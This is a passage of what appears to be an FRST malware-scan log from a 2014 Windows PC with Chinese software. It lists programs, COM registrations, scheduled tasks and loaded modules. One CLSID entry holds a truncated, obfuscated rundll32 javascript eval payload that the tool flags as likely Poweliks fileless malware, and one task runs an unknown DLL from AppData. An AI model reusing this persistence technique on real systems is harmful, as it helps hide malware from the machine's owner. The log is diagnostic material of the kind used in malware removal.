驱动精灵 (HKLM\...\DriverGenius) (Version: 2012 SP5 - 驱动之家)
驱动人生2010 (HKLM\...\{3DE1D32B-29A9-4e53-A0C2-9522F199E094}_is1) (Version: 2.3 - 深圳市驱动人生软件技术有限公司)
拳皇(The King of Fighters) 97  (HKLM\...\拳皇(The King of Fighters) 97) (Version:  - 多特软件站)
人人极速相册 (HKLM\...\rralbum) (Version:  - )
人人网相册上传工具 (HKLM\...\人人网相册上传工具) (Version:  - )
闪游浏览器 (HKCU\...\SaaYaa) (Version:  - )
闪游浏览器 (HKCU\...\SaaYaa3) (Version: 3.2.5.0 - 软媒网络科技有限公司)
闪游浏览器 (HKLM\...\SaaYaa) (Version:  - )
射手影音播放器 (HKLM\...\SPlayer) (Version:  - )
搜狗拼音输入法 7.2正式版 (HKLM\...\Sogou Input) (Version: 7.2.0.2991 - Sogou.com)
腾讯QQ2013 (HKLM\...\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}) (Version: 1.95.7633.0 - 腾讯科技(深圳)有限公司)
腾讯TM2009 (HKLM\...\{260706D6-56D3-41E8-9183-DC4DF54B7F4B}) (Version: 1.41.1287.0 - 腾讯科技(深圳)有限公司)
微软拼音输入法 2010 (HKLM\...\IME14SS.2052) (Version: 14.0.5800.1000 - Microsoft Corporation)
虾歌 (HKLM\...\{658D2C4F-158A-46FB-8C96-B1C8F56DBBE9}) (Version: 1.0.0.7Unicode - 杭州缪斯客网络科技有限公司)
卸载 豆丁桌面 (HKLM\...\{4A4538E0-C9EA-4360-8977-17F11B11E505}_is1) (Version:  - 豆丁网)
迅雷VIP尊享版 (HKLM\...\thunder_is1) (Version:  - 迅雷网络技术有限公司)
英特尔® PROSet/无线 WiFi 软件 (HKLM\...\{3FE3D6A5-2F5E-4870-A3AC-D1D88E0B2797}) (Version: 14.2.0000 - 英特尔公司)
英特尔® 主动管理技术 (HKLM\...\MESOL) (Version:  - Intel Corporation)
僌儕乕僼僔儞僪儘乕儉 (HKLM\...\{AD9E5D61-0EBB-4472-8DA9-359560FB6988}}_is1) (Version:  - 墿崹僼儘儞僥傿傾)
影视搜索 (HKLM\...\影视搜索) (Version: 1.2.0 - Shenzhen Qvod Technology Co.,Ltd)
用于 Windows 的 PC-Doctor 5 (HKLM\...\PC-Doctor 5 for Windows) (Version: 5.1.4957.02 - PC-Doctor, Inc.)
优酷客户端 (HKLM\...\YoukuClient) (Version: 3.7.0.12271 - youku, Inc.)
有道词典 (HKLM\...\有道词典) (Version: 4.3 - 网易公司)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\localserver32 -> c:\users\think\appdata\roaming\saayaa\saayaa.exe (RuanMei.com)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{0E75A0CB-0072-450A-8AF2-D56B82045B4F}\InprocServer32 -> Q:\Program Files\AliWangWang\7.00.07C\SDKDB.dll (Alibaba software (Shanghai) Corporation.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{38943A5A-33BB-4D28-909A-BF52B994D26A}\InprocServer32 -> C:\ProgramData\CBox\CCTVPlayer.ocx (CCTV.COM)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6777375D-DD17-46FF-A4E4-9650C00D5D92}\InprocServer32 -> Q:\Program Files\AliWangWang\7.00.07C\SDKDB.dll (Alibaba software (Shanghai) Corporation.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{679F137C-3162-45da-BE3C-2F9C3D093F64}\InprocServer32 -> C:\windows\system32\shdocvw.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6E73CA04-CE63-11CF-B59C-0000929132CE}\localserver32 -> C:\Users\THINK\Desktop\SigmaPlot\Spw.exe (Systat Software, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6E73CA51-CE63-11CF-B59C-0000929132CE}\localserver32 -> C:\Users\THINK\Desktop\SigmaPlot\Spw.exe (Systat Software, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6E73CA52-CE63-11CF-B59C-0000929132CE}\localserver32 -> C:\Users\THINK\Desktop\SigmaPlot\Spw.exe (Systat Software, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AC414988-E5BB-4C2C-873B-EA53D2F3D23A}\InprocServer32 -> C:\ProgramData\CBox\CCTVUpdateInstall.dll (CCTV International Networks Co.,Ltd)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{C728DAB8-FDF5-4CD7-89DD-879D25794C77}\InprocServer32 -> C:\ProgramData\CBox\CCTVPlayer.ocx (CCTV.COM)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{D4FEDB83-B705-497F-8707-6CA53D69FF9B}\InprocServer32 -> Q:\Program Files\AliWangWang\7.00.07C\SDKDB.dll (Alibaba software (Shanghai) Corporation.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{E7995762-8578-5C33-CB25-4104B87CB7E7}\InprocServer32 -> C:\Windows\system32\ole32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
15-09-2014 07:20:53 计划的检查点
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-07-20 14:51 - 2014-09-14 16:20 - 00000027 ____A C:\windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {085B50D9-E13A-4128-8C6D-ADA8D83AC38C} - \cdv No Task File <==== ATTENTION
Task: {10CE3C52-7A39-40F9-9F6D-22E6535A9FC9} - \AliUpdater{34C042BE-B09C-4D52-BD15-A8987411D03C} No Task File <==== ATTENTION
Task: {10E9D515-0455-4CDC-8E32-B1072030F540} - \At22 No Task File <==== ATTENTION
Task: {155723BA-60E2-4354-93AF-84EAC8D3C2D8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {177FDC6C-D518-4454-B318-14933EC0D66F} - \Adobe Flash Player Updater No Task File <==== ATTENTION
Task: {1DCEFFB9-CCA2-4265-BAC6-05C2599446ED} - \GoogleUpdateTaskMachineCore No Task File <==== ATTENTION
Task: {21EDAE60-37AC-4F29-9303-EE7AC2CBB46E} - \At13 No Task File <==== ATTENTION
Task: {22E1772E-7DFE-4C5F-841F-1C93FD5D82A4} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {29C88B5A-02BE-4573-B516-4E936EA08D64} - \At35 No Task File <==== ATTENTION
Task: {2DE18FE4-6467-484F-8431-206702EC5546} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {2E5B7D97-F14C-4CFF-864E-620AABA892D1} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {324F922B-8D91-4231-8F6A-4A9E31F59521} - \PMTask No Task File <==== ATTENTION
Task: {3288D09C-74DE-44E6-A868-7D4F23627AF0} - System32\Tasks\ASC7_SkipUac_THINK => Q:\Program Files\IObit\Advanced SystemCare 7\ASC.exe [2014-05-29] (IObit)
Task: {366A9D37-14B2-498D-B08C-9BD0546582C2} - \At8 No Task File <==== ATTENTION
Task: {375BAF51-DD22-406D-B8D3-7CD66043BCCC} - \At3 No Task File <==== ATTENTION
Task: {39186DE0-5863-4438-ACE3-CA139756A232} - \At49 No Task File <==== ATTENTION
Task: {3BB73B66-1CEE-46C2-BCE9-C84020BC2A4F} - System32\Tasks\ScanToPCActivationApp.exe_{72BA9741-FB3E-4B44-A845-33E8FCE77E44} => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2012-10-17] (Hewlett-Packard Co.)
Task: {3E39729E-3618-4D71-9664-10A633DD5B4F} - \At27 No Task File <==== ATTENTION
Task: {3E82C0D3-7BFC-4D71-971B-5E753E9F6130} - \{0B031F8E-669B-4B52-ACD6-4E81E492AD09} No Task File <==== ATTENTION
Task: {3EEABAB9-E304-4E27-8EEA-04F5AB1E905B} - \At20 No Task File <==== ATTENTION
Task: {3FACA755-D34A-4D96-9D3C-D4BAA5DB19A0} - \At12 No Task File <==== ATTENTION
Task: {3FD1A352-1D84-4099-B4EB-B0F4AC402618} - \At51 No Task File <==== ATTENTION
Task: {3FF21C17-8F18-48AD-8270-C8518D4B8EE1} - \{02989E67-A55E-4BD5-BE40-C552CC742D07} No Task File <==== ATTENTION
Task: {417ADD3A-621C-45D5-8151-74160C7B725A} - \At16 No Task File <==== ATTENTION
Task: {4237464F-3E47-4C1D-8285-1E21C40AAE67} - System32\Tasks\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB} => C:\Users\THINK\AppData\Roaming\wygiusy.dll/s "C:\Users\THINK\AppData\Roaming\wygiusy.dll"
Task: {4340A5ED-D5B4-4EE0-9CB9-77A408E23D4C} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {487E3789-53F7-44E5-B5E3-85B194D4BE47} - \At42 No Task File <==== ATTENTION
Task: {49541105-569C-4F8A-91A3-F0BCC27506C1} - \v No Task File <==== ATTENTION
Task: {4B2A47B4-C38F-4752-BB6B-E990EC0944E1} - \At46 No Task File <==== ATTENTION
Task: {4BCB0524-EBDB-48F3-AF7A-DB7979C7605C} - \sd No Task File <==== ATTENTION
Task: {4D72741E-769C-45DB-8604-CB8EBDADAA29} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {4DACE6B3-7810-4D10-A8D2-76681F0E4437} - \At47 No Task File <==== ATTENTION
Task: {515A1E50-86FD-437D-B596-CA2E47DFFF3C} - \At6 No Task File <==== ATTENTION
Task: {54D1716C-39A3-4368-9989-745312F072D0} - \Microsoft\Windows\WindowsCalendar\Reminders - THINK No Task File <==== ATTENTION
Task: {54D21B7D-3D70-4508-94B2-56FE25360C3B} - \At34 No Task File <==== ATTENTION
Task: {561D7B57-14FD-4279-B8D4-25A3EFD6BAE3} - \SogouImeMgr No Task File <==== ATTENTION
Task: {56C5C777-3174-404E-A04A-65086E3EBB24} - \At60 No Task File <==== ATTENTION
Task: {58CD6498-48AA-4B24-8A68-D0D11E1A0B4A} - \At25 No Task File <==== ATTENTION
Task: {5B231164-B4BF-41F8-A5C8-7696CE125E83} - \At55 No Task File <==== ATTENTION
Task: {5E2657B5-FE08-45DE-A5C6-C31F5CCFF21D} - \At5 No Task File <==== ATTENTION
Task: {6067899C-1F6F-4964-A2D6-134A24B9A05F} - \At28 No Task File <==== ATTENTION
Task: {616173A5-413A-40E3-AE26-C60E78B81BE6} - \At59 No Task File <==== ATTENTION
Task: {61BE53CD-82AD-4FCE-BC29-6A9155E93C33} - \At32 No Task File <==== ATTENTION
Task: {63E1478A-1547-4166-A4AA-90277B91DBB4} - \At9 No Task File <==== ATTENTION
Task: {69DFE260-91D9-4F9D-B20E-6CF56F065C37} - \At17 No Task File <==== ATTENTION
Task: {6C3ADDE8-45ED-447E-8931-0C67839E4194} - \At38 No Task File <==== ATTENTION
Task: {6CA694AE-D0CC-4B47-9A20-D3CA818F0819} - \DealPly No Task File <==== ATTENTION
Task: {6E7D09EB-CB15-433F-84BD-4B95118643FA} - \At57 No Task File <==== ATTENTION
Task: {70CC8A02-3C65-414C-8439-B1F25C75BC41} - \At41 No Task File <==== ATTENTION
Task: {712C7A4A-D663-4CA9-85F4-94105FCCAFC6} - \GoogleUpdateTaskUserS-1-5-21-55330172-1766457534-1491637609-1000UA No Task File <==== ATTENTION
Task: {732E3685-4455-47A0-AB8E-8B329E3B972E} - \At7 No Task File <==== ATTENTION
Task: {7854DE68-10DC-4882-9615-82A5F55971F9} - \HPCustParticipation HP Officejet Pro 8600 No Task File <==== ATTENTION
Task: {7884677C-BA8C-40C1-A97F-A2230951ECE1} - \At33 No Task File <==== ATTENTION
Task: {7B2874C9-55C5-4C2C-B26E-DF74A9B10A62} - \At23 No Task File <==== ATTENTION
Task: {8338E6EE-D3A4-4D6E-8B46-DA5D94BEFE1C} - \At26 No Task File <==== ATTENTION
Task: {83624475-3538-453B-89FD-E179E8F8413E} - \User_Feed_Synchronization-{918EC6E0-34B2-4DDA-906B-3C6EBC8C1F27} No Task File <==== ATTENTION
Task: {881F37CA-F140-4ADA-8398-C3F74162C131} - \At29 No Task File <==== ATTENTION
Task: {89DB9615-2A9C-40DB-919D-2B1DA8DD7F54} - \At44 No Task File <==== ATTENTION
Task: {8ED6212C-9CA2-4B5A-A14C-0B0B896C2D0D} - \At18 No Task File <==== ATTENTION
Task: {95C540F2-A9AF-4BE4-B7F5-8C88A898F006} - \GoogleUpdateTaskUserS-1-5-21-55330172-1766457534-1491637609-1000Core No Task File <==== ATTENTION
Task: {96EC3B33-48CC-418C-BB5C-0EBF8AF7314F} - \At45 No Task File <==== ATTENTION
Task: {992FB703-E483-4357-850E-4C49FBCB6FB8} - \360SuperKiller\360SuperKiller No Task File <==== ATTENTION
Task: {9ADBAAA9-4FDE-441D-8044-A19B94E756FD} - \At24 No Task File <==== ATTENTION
Task: {9BEDCD9D-B648-40EA-86F6-8B4AC3746351} - \At1 No Task File <==== ATTENTION
Task: {A1AF9806-B2A5-41C9-A8C2-57C370CDA504} - \At58 No Task File <==== ATTENTION
Task: {A8E39604-473F-401C-8C86-94A2B2489A77} - \At56 No Task File <==== ATTENTION
Task: {AD9E42A7-A381-4B03-BDC7-4A73045986FC} - \At40 No Task File <==== ATTENTION
Task: {B0AA658E-DF28-4F75-B41E-FAE0FF9BFE72} - \GoogleUpdateTaskMachineUA No Task File <==== ATTENTION
Task: {B66DBDD8-1116-49FC-9F2F-C5EAE5CED3AE} - \At54 No Task File <==== ATTENTION
Task: {B7C0B9A7-9ADB-49E1-80E7-19B1677FF97B} - \At39 No Task File <==== ATTENTION
Task: {BB244145-58AE-4E64-BF70-F0563A8CCA4C} - \OGALogon No Task File <==== ATTENTION
Task: {C13E7B30-5F36-41C2-A1AC-E69713FA2F6E} - \At11 No Task File <==== ATTENTION
Task: {C2F6D54C-D000-44E5-9968-C170E1504084} - System32\Tasks\Uninstaller_SkipUac_Administrator => q:\Program Files\IObit\IObit Uninstaller\IObitUninstaler.exe [2014-05-06] (IObit)
Task: {C5143DA2-538B-45EA-9229-220AEA4F2D40} - \At36 No Task File <==== ATTENTION
Task: {C5294896-018C-4197-A27A-64F68E968012} - \{656C7DFC-BB01-4A4C-89A7-58A0755573D0} No Task File <==== ATTENTION
Task: {C62FE94D-E9FC-43A9-8BD8-DCA492B53B03} - \At52 No Task File <==== ATTENTION
Task: {C67A0E9C-FED6-4F35-8030-894FDC1F97C9} - \At19 No Task File <==== ATTENTION
Task: {CD9391F5-D592-4CE7-A40B-5A06722A016B} - \ddddd No Task File <==== ATTENTION
Task: {CF7EDD10-2A3A-4DBD-9697-BFB475016C03} - \At61 No Task File <==== ATTENTION
Task: {D3B3AF92-98C1-4A32-83D4-3F2FAFAED5C1} - \At14 No Task File <==== ATTENTION
Task: {D4A64EE1-EE91-479F-9FDB-1E7445B6B35F} - \At50 No Task File <==== ATTENTION
Task: {D5AF7A18-00C7-405F-82EF-731B875FD81F} - \At53 No Task File <==== ATTENTION
Task: {D6964A31-FA9A-4568-8E7A-101B2E16CC05} - \At30 No Task File <==== ATTENTION
Task: {D7EF08D1-D7BD-4A6E-88FC-1F23F14FFA84} - \At2 No Task File <==== ATTENTION
Task: {D8681049-81DA-430E-A862-7528A9A9EF3F} - \OGADaily No Task File <==== ATTENTION
Task: {D938C1CB-3349-4185-B1B7-AB0B20402FE6} - \d No Task File <==== ATTENTION
Task: {DE533FA1-AB74-4344-B334-8CB9F7DC1110} - \{F1E1A888-3E56-4C53-BC4A-E141EC277CA9} No Task File <==== ATTENTION
Task: {E3DF1691-40C7-4AC1-81E7-D6A9C467EA65} - \At10 No Task File <==== ATTENTION
Task: {E45B2265-0C2F-4ADD-B01C-00816EFA8433} - \KwSingRunAsStdUser Task21963 No Task File <==== ATTENTION
Task: {E6D81A80-5011-4A9B-80D9-C7E9A51C0AB5} - \At37 No Task File <==== ATTENTION
Task: {EF2FEA48-9D94-4F78-AADC-8A093787228A} - \At15 No Task File <==== ATTENTION
Task: {F2BF07C5-4665-4C52-A25E-8E85480DC658} - \At31 No Task File <==== ATTENTION
Task: {F55CDFC9-2744-47A1-B755-9740301C6C99} - \Microsoft\Windows Defender\MP Scheduled Scan No Task File <==== ATTENTION
Task: {F840E8E7-7427-4427-8725-1585B6B08BB2} - \count-down shutdown No Task File <==== ATTENTION
Task: {FA0701D7-E87F-4467-9DA2-FF8751C79B00} - \At48 No Task File <==== ATTENTION
Task: {FA6B0B07-07A8-48F0-910F-BF8847A6F63F} - \At21 No Task File <==== ATTENTION
Task: {FA6F8CE2-48A9-4AAF-B8B3-0848613307A2} - \At43 No Task File <==== ATTENTION
Task: {FF4303A8-084A-404D-A5A0-9DC4B7B77C86} - \At4 No Task File <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-09-13 23:57 - 2010-10-20 22:19 - 00140696 _____ () q:\Program Files\Keniu\ConewRsc\conewrsc.exe
2014-09-13 23:57 - 2010-10-21 14:23 - 00353800 _____ () q:\Program Files\Keniu\ConewRsc\sqlite.dll
2010-12-10 07:10 - 2010-12-10 07:10 - 01118208 _____ () C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
2009-09-10 02:33 - 2007-06-18 04:28 - 00056056 ____N () C:\windows\system32\DLAAPI_W.DLL
2010-07-04 17:32 - 2010-07-04 17:32 - 00010752 _____ () q:\Program Files\Unlocker\UnlockerCOM.dll
2014-03-19 18:58 - 2014-03-19 18:58 - 00198088 _____ () Q:\Program Files\BaiduYunGuanjia\YunShellExt.dll
2009-09-11 06:23 - 2009-08-16 05:06 - 00141312 _____ () Q:\WinRAR\rarext.dll
2010-01-05 20:21 - 2008-02-25 09:51 - 00069632 _____ () q:\Program Files\IDM Computer Solutions\UltraEdit-32\ue32ctmn.dll
2011-07-01 02:48 - 2011-07-01 02:48 - 00043520 ____N () C:\Windows\system32\CmdLineExt03.dll
2003-07-10 14:08 - 2003-07-10 14:08 - 00029768 _____ () C:\Program Files\Common Files\microsoft shared\Web Folders\2052\NSEXTINT.DLL
2011-01-24 13:35 - 2011-01-24 13:35 - 00132384 _____ () C:\Program Files\ThinkPad\Bluetooth Software\btkeyind.dll
2014-09-10 23:45 - 2014-09-10 23:45 - 00129640 _____ () q:\Program Files\SogouInput\6.1.0.6700\SogouInput\Components\SgAppender\1.0.0.207\SgAppender_Dll.dll
2010-05-05 05:21 - 2010-05-05 05:21 - 00023040 ____N () C:\Windows\system32\atitmpxx.dll
2010-12-10 07:01 - 2010-12-10 07:01 - 00139264 _____ () C:\Program Files\Lenovo\Rescue and Recovery\CDRecord.dll
2011-11-02 00:26 - 2011-11-02 00:26 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2011-11-02 00:26 - 2011-11-02 00:26 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 08537928 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\pdf.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 00353096 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 01732936 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\ffmpegsumo.dll
2014-04-11 14:22 - 2014-02-10 13:44 - 04592128 _____ () C:\Users\THINK\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libglesv2.dll
2014-04-11 14:22 - 2014-02-10 13:44 - 00112128 _____ () C:\Users\THINK\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libegl.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00417280 _____ () Q:\Program Files\Winamp\nsutil.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00080384 _____ () Q:\Program Files\Winamp\nde.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00022016 _____ () Q:\Program Files\Winamp\nxlite.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00024576 _____ () Q:\Program Files\Winamp\System\albumart.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00173568 _____ () Q:\Program Files\Winamp\System\auth.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00019968 _____ () Q:\Program Files\Winamp\System\bmp.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00064512 _____ () Q:\Program Files\Winamp\zlib.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00044544 _____ () Q:\Program Files\Winamp\System\devices.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00016896 _____ () Q:\Program Files\Winamp\System\dlmgr.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00014336 _____ () Q:\Program Files\Winamp\System\filereader.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00019456 _____ () Q:\Program Files\Winamp\System\gif.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00016384 _____ () Q:\Program Files\Winamp\System\gracenote.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00624128 _____ () Q:\Program Files\Winamp\System\jnetlib.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00154624 _____ () Q:\Program Files\Winamp\System\jpeg.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00087552 _____ () Q:\Program Files\Winamp\System\playlist.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00088064 _____ () Q:\Program Files\Winamp\System\png.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00013824 _____ () Q:\Program Files\Winamp\System\primo.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00022016 _____ () Q:\Program Files\Winamp\System\tagz.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00038912 _____ () Q:\Program Files\Winamp\System\timer.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00043008 _____ () Q:\Program Files\Winamp\System\wasabi2.w5s
2013-03-09 00:09 - 2013-03-09 00:09 - 00607232 _____ () Q:\Program Files\Winamp\Components\cloud.w6c
2013-03-09 00:09 - 2014-07-28 19:10 - 00626688 _____ () Q:\Program Files\Winamp\jnetlib.dll
2013-03-09 00:09 - 2013-03-09 00:09 - 00018432 _____ () Q:\Program Files\Winamp\Components\ssdp.w6c
2013-03-09 00:09 - 2014-07-28 19:10 - 00090624 _____ () Q:\Program Files\Winamp\System\xml.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00068096 _____ () Q:\Program Files\Winamp\Plugins\in_avi.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00102400 _____ () Q:\Program Files\Winamp\Plugins\in_cdda.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00072704 _____ () Q:\Program Files\Winamp\Plugins\in_dshow.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00066048 _____ () Q:\Program Files\Winamp\Plugins\in_flac.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00043008 _____ () Q:\Program Files\Winamp\Plugins\in_flv.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00007168 _____ () Q:\Program Files\Winamp\Plugins\in_linein.dll
